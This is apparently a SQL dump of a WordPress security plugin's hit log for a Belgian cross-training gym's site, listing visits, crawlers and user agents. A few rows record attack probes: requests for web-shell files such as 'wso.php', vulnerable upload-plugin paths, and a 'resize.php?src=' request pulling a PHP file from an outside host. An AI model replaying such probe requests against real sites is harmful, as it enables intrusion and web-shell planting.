(76710, 1499238737.121167, 1374822686, 1, 0, 0, 0, 0, 'http://www.crosstrainingcenter.be/en-images/', 'http://www.crosstrainingcenter.be/le-cross-training/', 'Mozilla/5.0 (Linux; Android 6.0.1; SAMSUNG SM-A520F/A520FXXU1AQD3 Build/MMB29K) AppleWebKit/537.36 (KHTML, like Gecko) SamsungBrowser/5.4 Chrome/51.0.2704.106 Mobile Safari/537.36'),
(76711, 1499238759.133300, 520974775, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/en-images/', '', 'facebookexternalhit/1.1 (+http://www.facebook.com/externalhit_uatext.php)'),
(76712, 1499238764.794417, 1374822686, 1, 0, 0, 0, 0, 'http://www.crosstrainingcenter.be/lequipe/', 'http://www.crosstrainingcenter.be/en-images/', 'Mozilla/5.0 (Linux; Android 6.0.1; SAMSUNG SM-A520F/A520FXXU1AQD3 Build/MMB29K) AppleWebKit/537.36 (KHTML, like Gecko) SamsungBrowser/5.4 Chrome/51.0.2704.106 Mobile Safari/537.36'),
(76713, 1499238771.146932, 1538774068, 1, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/en-images/', 'https://l.facebook.com/', 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/59.0.3071.115 Safari/537.36'),
(76714, 1499238775.931662, 1538774068, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/wp-content/themes/figero/images/favicon.ico', 'http://www.crosstrainingcenter.be/en-images/', 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/59.0.3071.115 Safari/537.36'),
(76715, 1499238792.436078, 1374822686, 1, 0, 0, 0, 0, 'http://www.crosstrainingcenter.be/les-seances-namur/', 'http://www.crosstrainingcenter.be/lequipe/', 'Mozilla/5.0 (Linux; Android 6.0.1; SAMSUNG SM-A520F/A520FXXU1AQD3 Build/MMB29K) AppleWebKit/537.36 (KHTML, like Gecko) SamsungBrowser/5.4 Chrome/51.0.2704.106 Mobile Safari/537.36'),
(76716, 1499238805.139349, 1538774068, 1, 0, 0, 0, 0, 'http://www.crosstrainingcenter.be/le-cross-training/', 'http://www.crosstrainingcenter.be/en-images/', 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/59.0.3071.115 Safari/537.36'),
(76717, 1499238814.974151, 1538774068, 1, 0, 0, 0, 0, 'http://www.crosstrainingcenter.be/', 'http://www.crosstrainingcenter.be/le-cross-training/', 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/59.0.3071.115 Safari/537.36'),
(76718, 1499238851.484753, 1538774068, 1, 0, 0, 0, 0, 'http://www.crosstrainingcenter.be/notre-philosophie/', 'http://www.crosstrainingcenter.be/', 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/59.0.3071.115 Safari/537.36'),
(76719, 1499238852.808387, 1538774068, 1, 0, 0, 0, 0, 'http://www.crosstrainingcenter.be/les-seances-namur/', 'http://www.crosstrainingcenter.be/notre-philosophie/', 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/59.0.3071.115 Safari/537.36'),
(76720, 1499238859.800784, 1374822686, 1, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/en-images/', 'http://m.facebook.com/', 'Mozilla/5.0 (Linux; Android 6.0.1; SM-A520F Build/MMB29K; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/59.0.3071.125 Mobile Safari/537.36 [FB_IAB/MESSENGER;FBAV/124.0.0.43.69;]'),
(76721, 1499238863.312934, 1374822686, 1, 0, 0, 0, 0, 'http://www.crosstrainingcenter.be/les-seances-namur/', 'http://www.crosstrainingcenter.be/en-images/', 'Mozilla/5.0 (Linux; Android 6.0.1; SM-A520F Build/MMB29K; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/59.0.3071.125 Mobile Safari/537.36 [FB_IAB/MESSENGER;FBAV/124.0.0.43.69;]'),
(76722, 1499238865.494968, 1374822686, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/wp-content/themes/figero/images/favicon.ico', 'http://www.crosstrainingcenter.be/les-seances-namur/', 'Mozilla/5.0 (Linux; Android 6.0.1; SM-A520F Build/MMB29K; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/59.0.3071.125 Mobile Safari/537.36 [FB_IAB/MESSENGER;FBAV/124.0.0.43.69;]'),
(76723, 1499241565.168932, 1538774068, 1, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/', 'http://www.crosstrainingcenter.be/les-seances-namur/', 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/59.0.3071.115 Safari/537.36'),
(76724, 1499241568.148786, 1538774068, 1, 0, 0, 0, 0, 'http://www.crosstrainingcenter.be/contact/', 'http://www.crosstrainingcenter.be/', 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/59.0.3071.115 Safari/537.36'),
(76725, 1499249072.571645, 1539836988, 0, 1, 0, 0, 1, 'http://www.crosstrainingcenter.be/wp-content/plugins/acf-frontend-display/js/blueimp-jQuery-File-Upload-d45deb1/server/php/', 'http://www.google.com/', 'Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/56.0.2896.3 Safari/537.36'),
(76726, 1499253424.440417, 786801762, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/robots.txt', '', 'Mozilla/5.0 (compatible; SemrushBot/1.2~bl; +http://www.semrush.com/bot.html)'),
(76727, 1499255255.317266, 2783008843, 1, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/', 'https://www.google.be/', 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/54.0.2840.99 Safari/537.36'),
(76728, 1499255256.870770, 2783008843, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/wp-content/themes/figero/images/favicon.ico', 'http://www.crosstrainingcenter.be/', 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/54.0.2840.99 Safari/537.36'),
(76729, 1499257136.043271, 3024883609, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/', '', 'Mozilla/5.0 (compatible; Baiduspider/2.0; +http://www.baidu.com/search/spider.html)'),
(76730, 1499262293.695407, 1538595673, 1, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/le-cross-training/', 'http://www.crosstrainingcenter.be/', 'Mozilla/5.0 (Linux; Android 6.0.1; SM-J510FN Build/MMB29M) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/59.0.3071.125 Mobile Safari/537.36'),
(76731, 1499262296.904682, 1538595673, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/wp-content/themes/figero/images/favicon.ico', 'http://www.crosstrainingcenter.be/le-cross-training/', 'Mozilla/5.0 (Linux; Android 6.0.1; SM-J510FN Build/MMB29M) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/59.0.3071.125 Mobile Safari/537.36'),
(76732, 1499265300.911215, 96260888, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/le-cross-training/', '', 'Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)'),
(76733, 1499265302.659196, 96260888, 0, 0, 0, 0, 0, 'http://www.crosstrainingcenter.be/', '', 'Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)'),
(76734, 1499265303.247309, 96260888, 0, 0, 0, 0, 0, 'http://www.crosstrainingcenter.be/notre-philosophie/', '', 'Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)'),
(76735, 1499265303.839050, 96260888, 0, 0, 0, 0, 0, 'http://www.crosstrainingcenter.be/les-seances-namur/', '', 'Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)'),
(76736, 1499265305.429992, 96260888, 0, 0, 0, 0, 0, 'http://www.crosstrainingcenter.be/en-images/', '', 'Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)'),
(76737, 1499265306.256454, 96260888, 0, 0, 0, 0, 0, 'http://www.crosstrainingcenter.be/lequipe/', '', 'Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)'),
(76738, 1499265306.907539, 96260888, 0, 0, 0, 0, 0, 'http://www.crosstrainingcenter.be/contact/', '', 'Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)'),
(76739, 1499267337.122790, 3281714082, 0, 1, 0, 0, 1, 'http://www.crosstrainingcenter.be/wso.php', 'http://www.crosstrainingcenter.be/wso.php', 'Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/42.0.2311.152 Safari/537.36'),
(76740, 1499270299.971260, 1401321089, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/en-images/', 'http://m.facebook.com/', 'Mozilla/5.0 (Linux; Android 6.0.1; SM-A520F Build/MMB29K; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/59.0.3071.125 Mobile Safari/537.36 [FB_IAB/MESSENGER;FBAV/124.0.0.43.69;]'),
(76741, 1499276758.228377, 783509116, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/', '', 'Mozilla/5.0 (iPhone; CPU iPhone OS 10_3_2 like Mac OS X) AppleWebKit/603.2.4 (KHTML, like Gecko) Version/10.0 Mobile/14F89 Safari/602.1'),
(76742, 1499276758.858162, 783509116, 0, 1, 0, 0, 1, 'http://www.crosstrainingcenter.be/apple-touch-icon-120x120-precomposed.png', '', 'MobileSafari/602.1 CFNetwork/811.5.4 Darwin/16.6.0'),
(76743, 1499276759.333011, 783509116, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/apple-touch-icon-120x120.png', '', 'MobileSafari/602.1 CFNetwork/811.5.4 Darwin/16.6.0'),
(76744, 1499276759.797528, 783509116, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/apple-touch-icon-precomposed.png', '', 'MobileSafari/602.1 CFNetwork/811.5.4 Darwin/16.6.0'),
(76745, 1499276760.258260, 783509116, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/apple-touch-icon.png', '', 'MobileSafari/602.1 CFNetwork/811.5.4 Darwin/16.6.0'),
(76746, 1499276760.721578, 783509116, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/wp-content/themes/figero/images/favicon.ico', '', 'MobileSafari/602.1 CFNetwork/811.5.4 Darwin/16.6.0'),
(76747, 1499276761.289831, 783509116, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/apple-touch-icon-120x120-precomposed.png', '', 'MobileSafari/602.1 CFNetwork/811.5.4 Darwin/16.6.0'),
(76748, 1499276761.761467, 783509116, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/apple-touch-icon-120x120.png', '', 'MobileSafari/602.1 CFNetwork/811.5.4 Darwin/16.6.0'),
(76749, 1499276762.305834, 783509116, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/apple-touch-icon-precomposed.png', '', 'MobileSafari/602.1 CFNetwork/811.5.4 Darwin/16.6.0'),
(76750, 1499276762.838229, 783509116, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/apple-touch-icon.png', '', 'MobileSafari/602.1 CFNetwork/811.5.4 Darwin/16.6.0'),
(76751, 1499276763.517972, 783509116, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/wp-content/themes/figero/images/favicon.ico', '', 'MobileSafari/602.1 CFNetwork/811.5.4 Darwin/16.6.0'),
(76752, 1499277780.763905, 3475901895, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/robots.txt', '', 'Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)'),
(76753, 1499280689.071324, 2954838202, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/hello-world/', '', 'Mozilla/5.0 (Windows NT 6.1; Trident/7.0; rv:11.0) like Gecko'),
(76754, 1499285574.389059, 1538595673, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/wp-content/themes/figero/images/favicon.ico', 'http://www.crosstrainingcenter.be/le-cross-training/', 'Mozilla/5.0 (Linux; Android 6.0.1; SM-J510FN Build/MMB29M) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/59.0.3071.125 Mobile Safari/537.36'),
(76755, 1499286907.923883, 3585737171, 0, 0, 0, 0, 1, 'http://crosstrainingcenter.be/robots.txt', '', 'Mediatoolkitbot (complaints@mediatoolkit.com)'),
(76756, 1499310393.891142, 3024883468, 0, 0, 0, 0, 0, 'http://www.crosstrainingcenter.be/266-2/', '', 'Mozilla/5.0 (compatible; Baiduspider/2.0; +http://www.baidu.com/search/spider.html)'),
(76757, 1499310395.553069, 3024883600, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/robots.txt', '', 'Mozilla/5.0 (Windows NT 5.1; rv:6.0.2) Gecko/20100101 Firefox/6.0.2'),
(76758, 1499310820.392799, 2521214258, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/', '', 'Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0)'),
(76759, 1499319449.801241, 3104369886, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/robots.txt', '', 'Mozilla/5.0 (compatible; MJ12bot/v1.4.7; http://mj12bot.com/)'),
(76760, 1499319451.958800, 3104369886, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/contact/feed/', '', 'Mozilla/5.0 (compatible; MJ12bot/v1.4.7; http://mj12bot.com/)'),
(76761, 1499319454.098234, 3104369886, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/feed/', '', 'Mozilla/5.0 (compatible; MJ12bot/v1.4.7; http://mj12bot.com/)'),
(76762, 1499320378.537709, 2995873941, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/wp-content/themes/figero/images/favicon.ico', 'http://www.crosstrainingcenter.be/les-seances-namur/', 'Mozilla/5.0 (Linux; Android 6.0.1; SM-G903F Build/MMB29K) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/59.0.3071.125 Mobile Safari/537.36'),
(76763, 1499322456.950729, 2637637423, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/robots.txt', '', 'Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)'),
(76764, 1499324609.997501, 3103966404, 0, 0, 0, 0, 0, 'http://www.crosstrainingcenter.be/les-seances-namur/', '', 'Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko');
INSERT INTO `wp_wfHits` (`id`, `ctime`, `IP`, `jsRun`, `is404`, `isGoogle`, `userID`, `newVisit`, `URL`, `referer`, `UA`) VALUES
(76765, 1499324610.682042, 3249721826, 1, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/les-seances-namur/', 'http://www.google.be/url?sa=t&rct=j&q=&esrc=s&source=web&cd=11&ved=0ahUKEwismKWIi_TUAhUFXhoKHajuAHYQFgiRATAK&url=http%3A%2F%2Fwww.crosstrainingcenter.be%2Fles-seances-namur%2F&usg=AFQjCNF3CZXOTpgEhukKBcCq_alqy9J0kw', 'Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko'),
(76766, 1499324611.221893, 3103966404, 0, 1, 0, 0, 1, 'http://www.crosstrainingcenter.be/comments/feed', '', 'Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; InfoPath.1; .NET CLR 2.0.50727; .NET CLR 1.1.4322; MS-RTC LM 8; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)'),
(76767, 1499324611.613036, 3103966404, 0, 0, 0, 0, 0, 'http://www.crosstrainingcenter.be/feed/', '', 'Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; InfoPath.1; .NET CLR 2.0.50727; .NET CLR 1.1.4322; MS-RTC LM 8; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)'),
(76768, 1499324611.779624, 3103966404, 0, 0, 0, 0, 0, 'http://www.crosstrainingcenter.be/les-seances-namur/feed/', '', 'Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; InfoPath.1; .NET CLR 2.0.50727; .NET CLR 1.1.4322; MS-RTC LM 8; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)'),
(76769, 1499324611.991720, 3103966404, 0, 0, 0, 0, 0, 'http://www.crosstrainingcenter.be/les-seances-limelette/', '', 'Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; InfoPath.1; .NET CLR 2.0.50727; .NET CLR 1.1.4322; MS-RTC LM 8; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)'),
(76770, 1499324612.016037, 3103966404, 0, 0, 0, 0, 0, 'http://www.crosstrainingcenter.be/en-images/', '', 'Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; InfoPath.1; .NET CLR 2.0.50727; .NET CLR 1.1.4322; MS-RTC LM 8; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)'),
(76771, 1499324612.047416, 3103966404, 0, 0, 0, 0, 0, 'http://www.crosstrainingcenter.be/les-seances-namur/', '', 'Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; InfoPath.1; .NET CLR 2.0.50727; .NET CLR 1.1.4322; MS-RTC LM 8; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)'),
(76772, 1499324612.742484, 3249721826, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/les-seances-namur/', '', 'Mozilla/4.0 (compatible;)'),
(76773, 1499324613.626478, 3249721826, 0, 1, 0, 0, 1, 'http://www.crosstrainingcenter.be/wp-content/themes/figero/images/favicon.ico', '', 'Mozilla/4.0 (compatible;)'),
(76774, 1499324613.723752, 3249721826, 0, 1, 0, 0, 1, 'http://www.crosstrainingcenter.be/comments/feed/', '', 'Mozilla/4.0 (compatible;)'),
(76775, 1499324614.462735, 3249721826, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/feed/', '', 'Mozilla/4.0 (compatible;)'),
(76776, 1499324614.636526, 3249721826, 0, 1, 0, 0, 1, 'http://www.crosstrainingcenter.be/wp-content/themes/figero/images/favicon.ico', '', 'Mozilla/4.0 (compatible;)'),
(76777, 1499324614.720160, 3249721826, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/les-seances-namur/feed/', '', 'Mozilla/4.0 (compatible;)'),
(76778, 1499324614.889492, 3249721826, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/en-images/', '', 'Mozilla/4.0 (compatible;)'),
(76779, 1499324614.894960, 3249721826, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/les-seances-limelette/', '', 'Mozilla/4.0 (compatible;)'),
(76780, 1499324614.993356, 3249721826, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/les-seances-namur/', '', 'Mozilla/4.0 (compatible;)'),
(76781, 1499324615.559752, 3249721826, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/les-seances-limelette/', '', 'Mozilla/4.0 (compatible;)'),
(76782, 1499324615.735912, 3249721826, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/en-images/', '', 'Mozilla/4.0 (compatible;)'),
(76783, 1499324616.025311, 3249721826, 0, 1, 0, 0, 1, 'http://www.crosstrainingcenter.be/wp-content/themes/figero/images/favicon.ico', '', 'Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like Gecko'),
(76784, 1499324617.664326, 3103966404, 0, 0, 0, 0, 0, 'http://www.crosstrainingcenter.be/les-seances-limelette/feed/', '', 'Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; InfoPath.1; .NET CLR 2.0.50727; .NET CLR 1.1.4322; MS-RTC LM 8; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)'),
(76785, 1499324617.754745, 3103966404, 0, 0, 0, 0, 0, 'http://www.crosstrainingcenter.be/266-2/', '', 'Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; InfoPath.1; .NET CLR 2.0.50727; .NET CLR 1.1.4322; MS-RTC LM 8; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)'),
(76786, 1499324617.868996, 3103966404, 0, 0, 0, 0, 0, 'http://www.crosstrainingcenter.be/en-images/feed/', '', 'Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; InfoPath.1; .NET CLR 2.0.50727; .NET CLR 1.1.4322; MS-RTC LM 8; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)'),
(76787, 1499324618.563249, 3249721826, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/les-seances-limelette/feed/', '', 'Mozilla/4.0 (compatible;)'),
(76788, 1499324618.653221, 3249721826, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/en-images/feed/', '', 'Mozilla/4.0 (compatible;)'),
(76789, 1499324618.754363, 3249721826, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/266-2/', '', 'Mozilla/4.0 (compatible;)'),
(76790, 1499324619.193556, 3249721826, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/en-images/feed/', '', 'Mozilla/4.0 (compatible;)'),
(76791, 1499331651.129647, 1796538632, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/', 'http://www.crosstrainingcenter.be/', 'Mozilla/5.0 (compatible; DuckDuckGo-Favicons-Bot/1.0; +http://duckduckgo.com)'),
(76792, 1499331651.727936, 1796538632, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/wp-content/themes/figero/images/favicon.ico', 'http://www.crosstrainingcenter.be/wp-content/themes/figero/images/favicon.ico', 'Mozilla/5.0 (compatible; DuckDuckGo-Favicons-Bot/1.0; +http://duckduckgo.com)'),
(76793, 1499341398.817753, 3512959709, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/', '', '=Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16'),
(76794, 1499342673.557675, 1054012869, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/', '', 'Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0)'),
(76795, 1499350716.661471, 3373404845, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/', '', 'Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:50.0) Gecko/20100101 Firefox/50.0'),
(76796, 1499350718.032880, 3373404845, 0, 1, 0, 0, 1, 'http://www.crosstrainingcenter.be/wp-content/plugins/wp-mobile-detector/resize.php?src=http://www.laptopscreenrepair.net.au/search/cache.php', '', 'Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:50.0) Gecko/20100101 Firefox/50.0'),
(76797, 1499350718.832709, 3373404845, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/wp-content/plugins/wp-mobile-detector/cache/cache.php', '', 'Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:50.0) Gecko/20100101 Firefox/50.0'),
(76798, 1499350720.554942, 3373404845, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/wp-content/plugins/revslider/temp/update_extract/revslider/cache.php', '', 'Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:50.0) Gecko/20100101 Firefox/50.0'),
(76799, 1499360540.034878, 1375071234, 1, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/', 'https://www.google.be/', 'Mozilla/5.0 (iPhone; CPU iPhone OS 10_3_2 like Mac OS X) AppleWebKit/603.2.4 (KHTML, like Gecko) Version/10.0 Mobile/14F89 Safari/602.1'),
(76800, 1499360553.375654, 1375071234, 1, 0, 0, 0, 0, 'http://www.crosstrainingcenter.be/le-cross-training/', 'http://www.crosstrainingcenter.be/', 'Mozilla/5.0 (iPhone; CPU iPhone OS 10_3_2 like Mac OS X) AppleWebKit/603.2.4 (KHTML, like Gecko) Version/10.0 Mobile/14F89 Safari/602.1'),
(76801, 1499360567.882638, 1375071234, 1, 0, 0, 0, 0, 'http://www.crosstrainingcenter.be/notre-philosophie/', 'http://www.crosstrainingcenter.be/le-cross-training/', 'Mozilla/5.0 (iPhone; CPU iPhone OS 10_3_2 like Mac OS X) AppleWebKit/603.2.4 (KHTML, like Gecko) Version/10.0 Mobile/14F89 Safari/602.1'),
(76802, 1499369209.768819, 96753435, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/robots.txt', '', 'Mozilla/5.0 (compatible; AhrefsBot/5.2; +http://ahrefs.com/robot/)'),
(76803, 1499369210.870395, 872366427, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/', '', 'Mozilla/5.0 (compatible; AhrefsBot/5.2; +http://ahrefs.com/robot/)'),
(76804, 1499370152.967359, 1430848841, 0, 1, 0, 0, 1, 'http://crosstrainingcenter.be/tmp.php', 'http://crosstrainingcenter.be/tmp.php', 'Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)'),
(76805, 1499375724.317635, 2637637423, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/robots.txt', '', 'Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)'),
(76806, 1499381830.757444, 872366348, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/contact/feed/', '', 'Mozilla/5.0 (compatible; AhrefsBot/5.2; +http://ahrefs.com/robot/)'),
(76807, 1499385340.802551, 3475901829, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/266-2/', '', 'Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)'),
(76808, 1499385828.359690, 3475901829, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/notre-philosophie/', '', 'Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)'),
(76809, 1499415832.558273, 3251245561, 1, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/', 'http://www.bing.com/search?q=cross+training&src=IE-SearchBox&FORM=IENTTR&conversationid=', 'Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko'),
(76810, 1499415834.729380, 3251245561, 0, 1, 0, 0, 1, 'http://www.crosstrainingcenter.be/wp-content/themes/figero/images/favicon.ico', '', 'Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like Gecko'),
(76811, 1499415856.863963, 3251245561, 1, 0, 0, 0, 0, 'http://www.crosstrainingcenter.be/les-seances-namur/', 'http://www.crosstrainingcenter.be/', 'Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko'),
(76812, 1499415858.585254, 3251245561, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/wp-content/themes/figero/images/favicon.ico', '', 'Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like Gecko'),
(76813, 1499415910.326601, 3251245561, 1, 0, 0, 0, 0, 'http://www.crosstrainingcenter.be/en-images/', 'http://www.crosstrainingcenter.be/les-seances-namur/', 'Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko'),
(76814, 1499419112.252370, 2637637423, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/robots.txt', '', 'Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)'),
(76815, 1499419179.500288, 2637637530, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/hello-world/', '', 'Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)'),
(76816, 1499426336.376564, 1838091214, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/', '', 'Mozilla/5.0 (iPhone; CPU iPhone OS 10_3_2 like Mac OS X) AppleWebKit/603.2.4 (KHTML, like Gecko) Version/10.0 Mobile/14F89 Safari/602.1'),
(76817, 1499426336.980428, 1838091214, 0, 1, 0, 0, 1, 'http://www.crosstrainingcenter.be/apple-touch-icon-120x120-precomposed.png', '', 'MobileSafari/602.1 CFNetwork/811.5.4 Darwin/16.6.0'),
(76818, 1499426337.483175, 1838091214, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/apple-touch-icon-120x120.png', '', 'MobileSafari/602.1 CFNetwork/811.5.4 Darwin/16.6.0'),
(76819, 1499426337.979637, 1838091214, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/apple-touch-icon-precomposed.png', '', 'MobileSafari/602.1 CFNetwork/811.5.4 Darwin/16.6.0'),
(76820, 1499426338.450976, 1838091214, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/apple-touch-icon.png', '', 'MobileSafari/602.1 CFNetwork/811.5.4 Darwin/16.6.0'),
(76821, 1499426340.694957, 1838091214, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/wp-content/themes/figero/images/favicon.ico', '', 'MobileSafari/602.1 CFNetwork/811.5.4 Darwin/16.6.0'),
(76822, 1499426341.541468, 1838091214, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/apple-touch-icon-120x120-precomposed.png', '', 'MobileSafari/602.1 CFNetwork/811.5.4 Darwin/16.6.0'),
